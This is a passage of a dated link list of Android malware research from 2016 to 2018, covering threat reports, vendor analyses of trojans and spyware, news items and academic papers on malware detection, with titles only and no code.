[HeroRAT:一款全新的基于Telegram的安卓远程访问木马](http://www.freebuf.com/articles/terminal/175450.html) - 2018.06 [mrg] [On Android Philosophy and its Effects on Malware](https://www.mrg-effitas.com/research/on-android-philosophy-and-its-effects-on-malware/) - 2018.06 [arxiv] [[1806.08893] Automatic Investigation Framework for Android Malware Cyber-Infrastructures](https://arxiv.org/abs/1806.08893) - 2018.06 [trendmicro] [Android平台窃密软件FakeSpy, 针对日语和韩语用户](https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/) - 2018.06 [360] [新型安卓银行木马 MysteryBot 详细分析](https://www.anquanke.com/post/id/148201/) - 2018.06 [trustwave] [Red Alert v2.0: Misadventures in Reversing Android Bot Malware](https://www.trustwave.com/Resources/SpiderLabs-Blog/Red-Alert-v2-0--Misadventures-in-Reversing-Android-Bot-Malware/) - 2018.06 [360] [分析安卓恶意软件RuMMS新变种](https://www.anquanke.com/post/id/147352/) - 2018.06 [arxiv] [[1806.04847] Android Malware Detection using Large-scale Network Representation Learning](https://arxiv.org/abs/1806.04847) - 2018.06 [fortinet] [Android Spyware Now Dropping Legit Apps?](https://www.fortinet.com/blog/threat-research/android-spyware-now-dropping-legit-apps-.html) - 2018.05 [hispasec] [El 18% de los móviles Android con aplicaciones bancarias instaladas tienen algún tipo de malware.](https://unaaldia.hispasec.com/2018/05/el-18-de-los-moviles-android-con.html) - 2018.05 [arxiv] [[1805.11843] Android Malware Detection based on Factorization Machine](https://arxiv.org/abs/1805.11843) - 2018.05 [arxiv] [[1805.06620] DroidMark: A Tool for Android Malware Detection using Taint Analysis and Bayesian Network](https://arxiv.org/abs/1805.06620) - 2018.05 [4hou] [Maikspy间谍软件伪装成成人游戏,攻击Windows和安卓用户](http://www.4hou.com/system/11628.html) - 2018.05 [trendmicro] [多平台间谍软件Maikspy, 伪装成成人游戏, 进行传播](https://blog.trendmicro.com/trendlabs-security-intelligence/maikspy-spyware-poses-as-adult-game-targets-windows-and-android-users/) - 2018.04 [trendmicro] [黑客利用DNS投毒技术传播Android间谍软件XLoader](https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/) - 2018.04 [pentestingexperts] [Pre-Installed Malware Found On 5 Million Popular Android Phones](http://www.pentestingexperts.com/pre-installed-malware-found-on-5-million-popular-android-phones/) - 2018.04 [talosintelligence] [Android远控KevDroid的2个变种分析, 以及在此远控C&C发现的Windows远控PubNubRAT分析](https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html) - 2018.03 [trendmicro] [Android版本的门罗币挖矿软件HiddenMiner可导致设备损毁](https://blog.trendmicro.com/trendlabs-security-intelligence/monero-mining-hiddenminer-android-malware-can-potentially-cause-device-failure/) - 2018.03 [freebuf] [安卓手机遭恶意攻击,揭秘RottenSys的花式“隐匿术”](http://www.freebuf.com/articles/terminal/166415.html) - 2018.03 [360] [Android Malware RottenSys has infected 5 million smartphones](https://blog.360totalsecurity.com/en/android-malware-rottensys-infected-phones/) - 2018.03 [paloaltonetworks] [TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iran](https://unit42.paloaltonetworks.com/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/) - 2018.03 [htbridge] [Five Million Android Mobile Devices Pre-Installed With 'Aggressive' malware](https://www.immuniweb.com/blog/five-million-android-mobile-devices-pre-installed-with-aggressive-malware.html) - 2018.03 [htbridge] [Five Million Android Mobile Devices Pre-Installed With 'Aggressive' malware](https://www.htbridge.com/blog/five-million-android-mobile-devices-pre-installed-with-aggressive-malware.html) - 2018.03 [htbridge] [Hundreds of Android Apps are Attacking Phones With Windows Malware](https://www.immuniweb.com/blog/hundreds-of-android-apps-are-attacking-phones-with-windows-malware.html) - 2018.03 [htbridge] [Hundreds of Android Apps are Attacking Phones With Windows Malware](https://www.htbridge.com/blog/hundreds-of-android-apps-are-attacking-phones-with-windows-malware.html) - 2018.03 [myonlinesecurity] [Whatsapp plus spam leads to probable malware download for Android mobile phones.](https://myonlinesecurity.co.uk/whatsapp-plus-spam-leads-to-probable-malware-download-for-android-mobile-phones/) - 2018.03 [arxiv] [[1803.03448] A Family of Droids -- Android Malware Detection via Behavioral Modeling: Static vs Dynamic Analysis](https://arxiv.org/abs/1803.03448) - 2018.03 [arxiv] [[1803.03544] Explaining Black-box Android Malware Detection](https://arxiv.org/abs/1803.03544) - 2018.03 [freebuf] [MADLIRA:一款检测安卓端恶意软件的智能开源工具](http://www.freebuf.com/sectool/163104.html) - 2018.02 [lastline] [Detecting the Increased Threat of Android-based Malware](https://www.lastline.com/blog/android-based-malware/) - 2018.02 [arxiv] [[1802.01185] IntelliAV: Building an Effective On-Device Android Malware Detector](https://arxiv.org/abs/1802.01185) - 2018.01 [arxiv] [[1801.08115] Eight Years of Rider Measurement in the Android Malware Ecosystem: Evolution and Lessons Learned](https://arxiv.org/abs/1801.08115) - 2018.01 [360] [安卓间谍软件Skygofree:跟随HackingTeam的脚步](https://www.anquanke.com/post/id/95244/) - 2018.01 [cnn] [Pornographic malware found in Android apps for kids](https://money.cnn.com/2018/01/12/technology/porn-ads-apps-google-android/index.html) - 2018.01 [4hou] [安卓恶意软件检测:系统调用日志+机器学习算法](http://www.4hou.com/info/news/9669.html) - 2017.12 [4hou] [安卓恶意软件使用社会工程技术,伪装成2200家金融机构app](http://www.4hou.com/technology/9406.html) - 2017.12 [arxiv] [[1712.08996] Android Malware Detection using Deep Learning on API Method Sequences](https://arxiv.org/abs/1712.08996) - 2017.12 [4hou] [一款全能的安全木马Trojan.AndroidOS.Loapi:广告、SMS、挖矿、代理、爬虫样样精通](http://www.4hou.com/technology/9359.html) - 2017.12 [360] [Trojan.AndroidOS.Loapi:Android端恶意软件中的多面手](https://www.anquanke.com/post/id/91627/) - 2017.12 [n0where] [Advance Android Malware Analysis Framework: Droidefense](https://n0where.net/advance-android-malware-analysis-framework-droidefense) - 2017.12 [malwarebytes] [Lo lo lo Loapi Trojan could break your Android](https://blog.malwarebytes.com/cybercrime/2017/12/lo-lo-lo-lo-loapi-we-have-you-protected/) - 2017.12 [htbridge] [New Android crypto mining malware can destroy devices](https://www.immuniweb.com/blog/new-android-crypto-mining-malware-can-destroy-devices.html) - 2017.12 [htbridge] [New Android crypto mining malware can destroy devices](https://www.htbridge.com/blog/new-android-crypto-mining-malware-can-destroy-devices.html) - 2017.12 [4hou] [仔细检查,也许这款安卓恶意软件就在你手机上!](http://www.4hou.com/info/news/9187.html) - 2017.12 [arxiv] [[1712.04402] Android Malware Characterization using Metadata and Machine Learning Techniques](https://arxiv.org/abs/1712.04402) - 2017.11 [virusbulletin] [Tizi Android malware highlights the importance of security patches for high-risk users](https://www.virusbulletin.com/blog/2017/11/tizi-android-malware-highlights-importance-security-patches-high-risk-users/) - 2017.11 [googleblog] [Google Play Protect 识别出监控 WhatsApp/Telegram 的间谍 App, 命名为 Tizi](https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html) - 2017.11 [securelist] [Android commercial spyware](https://securelist.com/android-commercial-spyware/83098/) - 2017.11 [mcafee] [Android Malware Appears Linked to Lazarus Cybercrime Group](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/) - 2017.11 [mcafee] [Android Malware Appears Linked to Lazarus Cybercrime Group](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/) - 2017.11 [mcafee] [朝鲜黑客组织 Lazarus 使用Android App 攻击韩国用户](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/) - 2017.11 [arxiv] [[1711.07477] MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models (Extended Version)](https://arxiv.org/abs/1711.07477) - 2017.11 [arxiv] [[1711.05731] Android Malware Detection using Markov Chain Model of Application Behaviors in Requesting System Services](https://arxiv.org/abs/1711.05731) - 2017.11 [mcafee] [New Android Malware Found in 144 GooglePlay Apps](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/android-malware-grabos-exposed-millions-to-pay-per-install-scam-on-google-play/) - 2017.11 [mcafee] [New Android Malware Found in 144 GooglePlay Apps](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-grabos-exposed-millions-to-pay-per-install-scam-on-google-play/) - 2017.11 [malwarebytes] [New Android Trojan malware discovered in Google Play](https://blog.malwarebytes.com/cybercrime/2017/11/new-trojan-malware-discovered-google-play/) - 2017.11 [mcafee] [New Android Malware Found in 144 GooglePlay Apps](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-grabos-exposed-millions-to-pay-per-install-scam-on-google-play/) - 2017.11 [trendmicro] [使用 Toast Overlay 攻击的 Android 恶意软件分析](https://blog.trendmicro.com/trendlabs-security-intelligence/toast-overlay-weaponized-install-android-malware-single-attack-chain/) - 2017.11 [htbridge] [Android app siege - malware epidemic strikes](https://www.htbridge.com/blog/android-app-siege-malware-epidemic-strikes.html) - 2017.11 [arxiv] [[1711.02715] Contaminant Removal for Android Malware Detection Systems](https://arxiv.org/abs/1711.02715) - 2017.11 [f] [2017. The Year Android and Mac Malware Broke Big?](https://safeandsavvy.f-secure.com/2017/11/03/2017-the-year-android-and-mac-malware-broke-big/) - 2017.11 [f] [2017. The Year Android and Mac Malware Broke Big?](https://blog.f-secure.com/2017-the-year-android-and-mac-malware-broke-big/) - 2017.10 [rednaga] [Hacking with dex-oracle for Android Malware Deobfuscation](https://rednaga.io/2017/10/28/hacking-with-dex-oracle-for-android-malware-deobfuscation/) - 2017.10 [nsfocus] [研究人员发现新型安卓银行木马Red Alert](http://blog.nsfocus.net/researchers-find-android-bank-trojans-red-alert/) - 2017.09 [arxiv] [[1709.08805] Malware Detection Approach for Android systems Using System Call Logs](https://arxiv.org/abs/1709.08805) - 2017.09 [trendmicro] [首个利用 Dirty COW 漏洞的Android 恶意软件 ZNIU 分析](https://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/) - 2017.09 [arxiv] [[1709.04186] On labeling Android malware signatures using minhashing and further classification with Structural Equation Models](https://arxiv.org/abs/1709.04186) - 2017.09 [arxiv] [[1709.00875] Android Malware Family Classification Based on Resource Consumption over Time](https://arxiv.org/abs/1709.00875) - 2017.09 [f5] [WireX Android DDoS Malware Adds UDP Flood](https://f5.com/labs/articles/threat-intelligence/ddos/wirex-android-ddos-malware-adds-udp-flood) - 2017.08 [mcafee] [Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/android-banking-trojan-moqhao-spreading-via-sms-phishing-south-korea/) - 2017.08 [mcafee] [Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-banking-trojan-moqhao-spreading-via-sms-phishing-south-korea/) - 2017.08 [mrg] [A Note on the War of Android AVs and Advanced Malware](https://www.mrg-effitas.com/research/a-note-on-the-war-of-android-avs-and-advanced-malware/) - 2017.08 [mcafee] [Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea](https://securingtomorrow.mcafee.com/mcafee-labs/android-banking-trojan-moqhao-spreading-via-sms-phishing-south-korea/) - 2017.08 [malwarebytes] [Solution Corner: Malwarebytes for Android](https://blog.malwarebytes.com/malwarebytes-news/2017/08/solution-corner-malwarebytes-android/) - 2017.08 [calebfenton] [使用马可夫链(Markov Chains)检测 Android 恶意代码](http://calebfenton.github.io/2017/08/23/using-markov-chains-for-android-malware-detection/) - 2017.08 [fortinet] [Analyzing Android malware using a FortiSandbox](https://www.fortinet.com/blog/threat-research/analyzing-android-malware-using-a-fortisandbox.html) - 2017.08 [trendmicro] [GhostClicker Adware is a Phantomlike Android Click Fraud](https://blog.trendmicro.com/trendlabs-security-intelligence/ghostclicker-adware-is-a-phantomlike-android-click-fraud/) - 2017.08 [n0where] [Automated Android Malware Analysis: CuckooDroid](https://n0where.net/automated-android-malware-analysis-cuckoodroid) - 2017.08 [cylance] [Summer 2017's Most Common Android Malware](https://www.cylance.com/en_us/blog/summer-2017-most-common-android-malware.html) - 2017.08 [trendmicro] [The Persistent Threat of Android Malware](http://blog.trendmicro.com/the-persistent-threat-of-android-malware/) - 2017.08 [b0n1] [Android Banking Trojan misuses accessibility services](http://b0n1.blogspot.com/2017/08/android-banking-trojan-misuses.html) - 2017.08 [kudelskisecurity] [Checking your Android device for known malware](https://research.kudelskisecurity.com/2017/08/08/checking-your-android-device-for-known-malware/) - 2017.08 [b0n1] [Android Banking Trojan misuses accessibility services](https://lukasstefanko.com/2017/08/android-banking-trojan-misuses-accessibility-services.html) - 2017.08 [4hou] [安卓银行木马新增“keylogger”功能,攻击能力倍增](http://www.4hou.com/info/news/6951.html) - 2017.07 [welivesecurity] [Malware found lurking behind every app of alternative Android store](https://www.welivesecurity.com/2017/07/25/malware-found-lurking-behind-every-app-alternative-android-store/) - 2017.07 [itgovernance] [CopyCat malware infects 14 million Android devices](https://www.itgovernance.eu/blog/en/copycat-malware-infects-14-million-android-devices/) - 2017.07 [arxiv] [[1707.04795] Android Malware Clustering through Malicious Payload Mining](https://arxiv.org/abs/1707.04795) - 2017.07 [4hou] [LeakerLocker—窃取个人私密信息进行勒索的安卓恶意软件](http://www.4hou.com/info/news/6214.html) - 2017.07 [4hou] [超级间谍软件SpyDealer:可同时监视40余款安卓应用,包括微信、淘宝、百度网盘等](http://www.4hou.com/info/news/6174.html) - 2017.07 [fortinet] [Unmasking Android Malware: A Deep Dive into a New Rootnik Variant, Part III](https://blog.fortinet.com/2017/07/09/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-iii) - 2017.07 [fortinet] [Unmasking Android Malware: A Deep Dive into a New Rootnik Variant, Part II](https://blog.fortinet.com/2017/07/09/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-ii) - 2017.07 [fortinet] [Unmasking Android Malware: A Deep Dive into a New Rootnik Variant, Part I](https://blog.fortinet.com/2017/07/09/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-i) - 2017.07 [fortinet] [新型 Rootnik 变种深入分析(Android) Part 2](https://www.fortinet.com/blog/threat-research/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-ii.html) - 2017.07 [fortinet] [新型 Rootnik 变种深入分析(Android) Part 3](https://www.fortinet.com/blog/threat-research/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-iii.html) - 2017.07 [fortinet] [新型 Rootnik 变种深入分析(Android) Part 1](https://www.fortinet.com/blog/threat-research/unmasking-android-malware-a-deep-dive-into-a-new-rootnik-variant-part-i.html) - 2017.07 [checkpoint] [How the CopyCat malware infected Android devices around the world | Check Point Software Blog](https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/) - 2017.07 [paloaltonetworks] [SpyDealer: Android Trojan Spying on More Tha](https://unit42.paloaltonetworks.com/unit42-spydealer-android-trojan-spying-40-apps/) - 2017.06 [360] [安卓新型恶意木马Xavier的发展过程和技术分析](https://www.anquanke.com/post/id/86325/) - 2017.06 [freebuf] [安卓新型恶意木马Xavier的发展过程和技术分析](http://www.freebuf.com/articles/terminal/137988.html) - 2017.06 [virqdroid] [More on Android Trojan spying on Iranian users controlled via Telegram](http://www.virqdroid.com/2017/06/android-trojan-iran-telegram.html) - 2017.06 [freebuf] [安天移动安全关于“Dvmap”安卓恶意软件分析报告](http://www.freebuf.com/articles/terminal/137015.html) - 2017.06 [avlsec] [安天移动安全关于“Dvmap”安卓恶意软件分析报告](http://blog.avlsec.com/2017/06/4643/dvmap/) - 2017.06 [securelist] [卡巴斯基首次发现代码注入的 Android 恶意 App:运行时将恶意代码注入系统库 libdmv.so 或者 libandroid_runtime.so。此恶意 App 甚至支持64位 Android 系统](https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/) - 2017.06 [arxiv] [[1706.00947] Context-aware, Adaptive and Scalable Android Malware Detection through Online Learning (extended version)](https://arxiv.org/abs/1706.00947) - 2017.05 [qq] [腾讯反诈骗实验室: 2017年Q1安卓ROOT类恶意病毒发展趋势研究报告](https://slab.qq.com/news/authority/1585.html) - 2017.05 [freebuf] [2017年Q1安卓ROOT类恶意病毒发展趋势研究报告](http://www.freebuf.com/articles/terminal/134977.html) - 2017.05 [arxiv] [[1705.04448] R2-D2: ColoR-inspired Convolutional NeuRal Network (CNN)-based AndroiD Malware Detections](https://arxiv.org/abs/1705.04448) - 2017.04 [freebuf] [2017第一季度安卓短信扣费木马研究:七成扣费木马擅长以”用户的名义”骗取话费](http://www.freebuf.com/articles/terminal/133118.html) - 2017.04 [arxiv] [[1704.08996] Yes, Machine Learning Can Be More Secure! A Case Study on Android Malware Detection](https://arxiv.org/abs/1704.08996) - 2017.04 [NDSSSymposium] [NDSS 2017: MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models](https://www.youtube.com/watch?v=cmt84cImr4Y) - 2017.04 [trendmicro] [(Android)DressCode 的后继者:MilkyDoor 分析](https://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-android-malware-finds-successor-milkydoor/) - 2017.04 [arxiv] [[1704.05948] Semi-supervised classification for dynamic Android malware detection](https://arxiv.org/abs/1704.05948) - 2017.04 [arxiv] [[1704.01759] A Multi-view Context-aware Approach to Android Malware Detection and Malicious Code Localization](https://arxiv.org/abs/1704.01759) - 2017.03 [arxiv] [[1703.10926] EMULATOR vs REAL PHONE: Android Malware Detection Using Machine Learning](https://arxiv.org/abs/1703.10926) - 2017.03 [paloaltonetworks] [A New Trend in Android Adware: Abusing Android Plugin F](https://unit42.paloaltonetworks.com/unit42-new-trend-android-adware-abusing-android-plugin-frameworks/) - 2017.03 [4hou] [多款安卓智能手机被预安装恶意软件,包括三星、小米、联想](http://www.4hou.com/info/3805.html) - 2017.03 [crysys] [Update on the Fancy Bear Android malware (poprd30.apk)](http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/) - 2017.03 [4hou] [360发布《2016年安卓恶意软件专题报告》钓鱼、勒索和色情最猖獗 每天70万人次感染](http://www.4hou.com/technology/3474.html) - 2017.02 [freebuf] [安卓现新的木马病毒,可模仿用户点击下载危险的恶意软件](http://www.freebuf.com/news/127203.html) - 2017.02 [bartblaze] [Android malware on the rise](https://bartblaze.blogspot.com/2017/02/android-malware-on-rise.html) - 2017.02 [welivesecurity] [Released Android malware source code used to run a banking botnet](https://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/) - 2017.02 [4hou] [“木马下载器”伪装成Adobe Flash Player升级程序,攻击安卓用户](http://www.4hou.com/info/news/3441.html) - 2017.02 [welivesecurity] [Android malware: It doesn't hurt to know about this](https://www.welivesecurity.com/2017/02/21/doesnt-hurt-know-android-malware/) - 2017.02 [arxiv] [[1702.05699] DySign: Dynamic Fingerprinting for the Automatic Detection of Android Malware](https://arxiv.org/abs/1702.05699) - 2017.02 [f] [Another Reason 99% of Mobile Malware Targets Androids](https://safeandsavvy.f-secure.com/2017/02/15/another-reason-99-percent-of-mobile-malware-targets-androids/) - 2017.02 [f] [Another Reason 99% of Mobile Malware Targets Androids](https://blog.f-secure.com/another-reason-99-percent-of-mobile-malware-targets-androids/) - 2017.02 [welivesecurity] [New Android trojan mimics user clicks to download dangerous malware](https://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/) - 2017.01 [blackmoreops] [Android Banking Trojan Virus code leaks and sparks copycats immediately](https://www.blackmoreops.com/2017/01/23/android-banking-trojan-virus-code-leaks-and-sparks-copycats-immediately/) - 2017.01 [fortinet] [Android Locker Malware uses Google Cloud Messaging Service](https://www.fortinet.com/blog/threat-research/android-locker-malware-uses-google-cloud-messaging-service.html) - 2017.01 [4hou] [《超级马里奥酷跑》被发现是一个安卓银行木马?](http://www.4hou.com/info/news/2949.html) - 2017.01 [crysys] [Technical details on the Fancy Bear Android malware (poprd30.apk)](http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/) - 2016.12 [4hou] [便宜的安卓手机简直了,全部预装木马后门](http://www.4hou.com/vulnerable/1369.html) - 2016.12 [arxiv] [[1612.04433] MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models](https://arxiv.org/abs/1612.04433) - 2016.12 [arxiv] [[1612.03312] Monet: A User-oriented Behavior-based Malware Variants Detection System for Android](https://arxiv.org/abs/1612.03312) - 2016.12 [trustedsec] [Episode 2.3 – Flash Exploits, PowerShell Hacking, Investigating the Elections, Expedia Hacker, Android Malware, and Shutting down the Note 7. TT: Ruler, MailSniper](https://www.trustedsec.com/2016/12/episode-2-3-flash-exploits-powershell-hacking-investigating-elections-expedia-hacker-android-malware-shutting-note-7-tt-ruler-mailsniper/) - 2016.12 [arxiv] [[1612.01445] N-gram Opcode Analysis for Android Malware Detection](https://arxiv.org/abs/1612.01445) - 2016.12 [malwarebytes] [Malware taking advantage of Android OS exploits, again: Gooligan](https://blog.malwarebytes.com/cybercrime/2016/12/malware-taking-advantage-of-android-os-exploits-again-gooligan/) - 2016.11 [paloaltonetworks] [PluginPhantom: New Android Trojan Abuses “DroidPlugin”](https://unit42.paloaltonetworks.com/unit42-pluginphantom-new-android-trojan-abuses-droidplugin-framework/) - 2016.11 [checkpoint] [More Than 1 Million Google Accounts Breached by Gooligan, New Android Malware Variant](https://www.checkpoint.com/press/2016/1-million-google-accounts-breached-gooligan-new-android-malware-variant/) - 2016.11 [freebuf] [爆料:安卓“间谍门”事件愈演愈烈,又一家中国公司被曝在300万台安卓设备中植入rootkit](http://www.freebuf.com/news/120639.html) - 2016.11 [fortinet] [Android Malware Masquerades as Banking App, Part II](https://www.fortinet.com/blog/threat-research/android-malware-masquerades-as-banking-app-part-ii.html) - 2016.11 [fortinet] [Android Banking Malware Masquerading as Email App Targets German Banks](https://www.fortinet.com/blog/threat-research/android-banking-malware-masquerading-as-email-app-targets-german-banks.html) - 2016.11 [4hou] [大材小用?Chrome 0day漏洞被用于传播安卓木马](http://www.4hou.com/vulnerable/875.html) - 2016.11 [deepsec] [DeepSec 2016 Talk: Obfuscated Financial Fraud Android Malware: Detection And Behavior Tracking – Inseung Yang](http://blog.deepsec.net/deepsec-2016-talk-obfuscated-financial-fraud-android-malware-detection-behavior-tracking-inseung-yang/) - 2016.11 [freebuf] [专攻企业高管的安卓商业间谍软件Exaspy被揭露](http://www.freebuf.com/articles/terminal/119529.html) - 2016.11 [skycure] [Exaspy: The Newest Android Spyware Targeting Executives](https://www.skycure.com/blog/exaspy-commodity-android-spyware-targeting-high-level-executives/) - 2016.11 [fortinet] [Android banking malware masquerades as Flash Player, targeting large banks and popular social media apps](https://www.fortinet.com/blog/threat-research/android-banking-malware-masquerades-as-flash-player-targeting-large-banks-and-popular-social-media-apps.html) - 2016.10 [mcafee] [Android Banking Trojan Asks for Selfie With Your ID](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-banking-trojan-asks-for-selfie-with-your-id/) - 2016.10 [mcafee] [Android Banking Trojan Asks for Selfie With Your ID](https://securingtomorrow.mcafee.com/mcafee-labs/android-banking-trojan-asks-for-selfie-with-your-id/) - 2016.09 [4hou] [新型安卓木马Tordow已大开杀戮](http://www.4hou.com/info/news/1924.html) - 2016.09 [freebuf] [都是权限惹的祸:安卓恶意APP如何将其他APP中的私有数据搞到手](http://www.freebuf.com/articles/terminal/114330.html) - 2016.09 [freebuf] [安卓ELF恶意软件深度分析](http://www.freebuf.com/articles/system/113964.html) - 2016.09 [arxiv] [[1609.04718] Glassbox: Dynamic Analysis Platform for Malware Android Applications on Real Devices](https://arxiv.org/abs/1609.04718) - 2016.09 [paloaltonetworks] [DualToy: New Windows Trojan Sideloads Risky Apps to Android and iO](https://unit42.paloaltonetworks.com/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/) - 2016.09 [checkpoint] [CallJam Android Malware Found on Google Play | Check Point Software Blog](https://blog.checkpoint.com/2016/09/08/calljam-android-malware-found-on-google-play/) - 2016.09 [securelist] [Banking Trojan, Gugi, evolves to bypass Android 6 protection](https://securelist.com/banking-trojan-gugi-evolves-to-bypass-android-6-protection/75971/) - 2016.09 [n0where] [Advance Android Malware Analysis Tool: apkr](https://n0where.net/advance-android-malware-analysis-tool-apkr) - 2016.08 [checkpoint] [DressCode Android Malware Discovered on Google Play | Check Point Software Blog](https://blog.checkpoint.com/2016/08/31/dresscode-android-malware-discovered-on-google-play/) - 2016.08 [trendmicro] [These ads are more than annoying: Android banking malware to watch out for](http://blog.trendmicro.com/these-ads-are-more-than-annoying-android-banking-malware-to-watch-out-for/) - 2016.08 [trustlook] [Trustlook Discovers a Remote Administration Tool (RAT) Android Malware](https://blog.trustlook.com/2016/08/22/trustlook-discovers-a-remote-administration-tool-rat-android-malware/) - 2016.08 [arxiv] [[1608.05812] Analysis of Bayesian Classification based Approaches for Android Malware Detection](https://arxiv.org/abs/1608.05812) - 2016.08 [dynamoo] [Malware spam: "New Doc" / "Scanned by CamScanner" / "Sent from Yahoo Mail on Android"](https://blog.dynamoo.com/2016/08/malware-spam-new-doc-scanned-by.html) - 2016.08 [arxiv] [[1608.00848] A New Android Malware Detection Approach Using Bayesian Classification](https://arxiv.org/abs/1608.00848) - 2016.08 [arxiv] [[1608.00835] High Accuracy Android Malware Detection Using Ensemble Learning](https://arxiv.org/abs/1608.00835) - 2016.07 [0x00sec] [Android Malware: A Tumor called Marla 0x02 [C#]](https://0x00sec.org/t/android-malware-a-tumor-called-marla-0x02-c/859/) - 2016.07 [paloaltonetworks] [SpyNote Android Trojan Build](https://unit42.paloaltonetworks.com/unit42-spynote-android-trojan-builder-leaked/) - 2016.07 [arxiv] [[1607.08186] Android Malware Detection Using Parallel Machine Learning Classifiers](https://arxiv.org/abs/1607.08186) - 2016.07 [arxiv] [[1607.08149] N-opcode Analysis for Android Malware Classification and Categorization](https://arxiv.org/abs/1607.08149) - 2016.07 [arxiv] [[1607.08087] Android Malware Detection: an Eigenspace Analysis Approach](https://arxiv.org/abs/1607.08087) - 2016.07 [cerbero] [Extracting C&C from Android Malware](http://cerbero-blog.com/?p=1633) - 2016.07 [0x00sec] [Android Malware - Start the App at Boot and get Kernel Version 0x01 [C#]](https://0x00sec.org/t/android-malware-start-the-app-at-boot-and-get-kernel-version-0x01-c/793/) - 2016.07 [0x00sec] [Introduction to the Android Malware Series - 0x00](https://0x00sec.org/t/introduction-to-the-android-malware-series-0x00/770/) - 2016.07 [freebuf] [安卓破解版Pokémon Go?DroidJack木马开始蔓延](http://www.freebuf.com/news/109023.html) - 2016.07 [mcafee] [Trojanized Pokémon GO Android App Found in the Wild](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/trojanized-pokemon-go-android-app-found-wild/) - 2016.07 [mcafee] [Trojanized Pokémon GO Android App Found in the Wild](https://securingtomorrow.mcafee.com/mcafee-labs/trojanized-pokemon-go-android-app-found-wild/) - 2016.07 [checkpoint] [From HummingBad to Worse: New In-Depth Details and Analysis of the HummingBad Android Malware Campaign | Check Point Software Blog](https://blog.checkpoint.com/2016/07/01/from-hummingbad-to-worse-new-in-depth-details-and-analysis-of-the-hummingbad-andriod-malware-campaign/) - 2016.07 [securitygossip] [Apposcopy: Semantics-Based Detection of Android Malware Through Static Analysis](http://securitygossip.com/blog/2016/07/01/2016-07-01/) - 2016.07 [sjtu] [Apposcopy: Semantics-Based Detection of Android Malware Through Static Analysis](https://loccs.sjtu.edu.cn/gossip/blog/2016/07/01/2016-07-01/) - 2016.06 [fireeye] [The Latest Android Overlay Malware Spreading via SMS Phishing in Europe](https://www.fireeye.com/blog/threat-research/2016/06/latest-android-overlay-malware-spreading-in-europe.html) - 2016.06 [freebuf] [Godless类恶意APP可Root 90%安卓设备](http://www.freebuf.com/news/107835.html) - 2016.06 [publicintelligence] [FBI Cyber Bulletin: Android Malware Phishing for Financial Institution Customer Credentials](https://publicintelligence.net/fbi-slembunk-malware/) - 2016.06 [arxiv] [[1606.07150] Adaptive and Scalable Android Malware Detection through Online Learning](https://arxiv.org/abs/1606.07150) - 2016.06 [malwarebytes] [Android Trojan FakeApp masquerading as legitimate](https://blog.malwarebytes.com/cybercrime/mobile/2016/06/android-trojan-fakeapp-masquerading-as-popular-apps-phishing-for-clicks-installs/) - 2016.06 [arxiv] [[1606.01403] Andro-profiler: Detecting and Classifying Android Malware based on Behavioral Profiles](https://arxiv.org/abs/1606.01403) - 2016.05 [mcafee] [Android Spyware Targets Security Job Seekers in Saudi Arabia](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-spyware-targets-security-job-seekers-in-saudi-arabia/) - 2016.05 [mcafee] [Android Spyware Targets Security Job Seekers in Saudi Arabia](https://securingtomorrow.mcafee.com/mcafee-labs/android-spyware-targets-security-job-seekers-in-saudi-arabia/) - 2016.05 [mcafee] [Android Banking Trojan 'SpyLocker' Targets More Banks in Europe](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-banking-trojan-spylocker-targets-more-banks-in-europe/) - 2016.05 [mcafee] [Android Banking Trojan ‘SpyLocker’ Targets More Banks in Europe](https://securingtomorrow.mcafee.com/mcafee-labs/android-banking-trojan-spylocker-targets-more-banks-in-europe/) - 2016.05 [fortinet] [Android AdWare Trying to Deceive the Analyst](https://www.fortinet.com/blog/threat-research/android-adware-trying-to-deceive-the-analyst.html) - 2016.05 [mcafee] [Sex Sells: Looking at Android Adult Adware 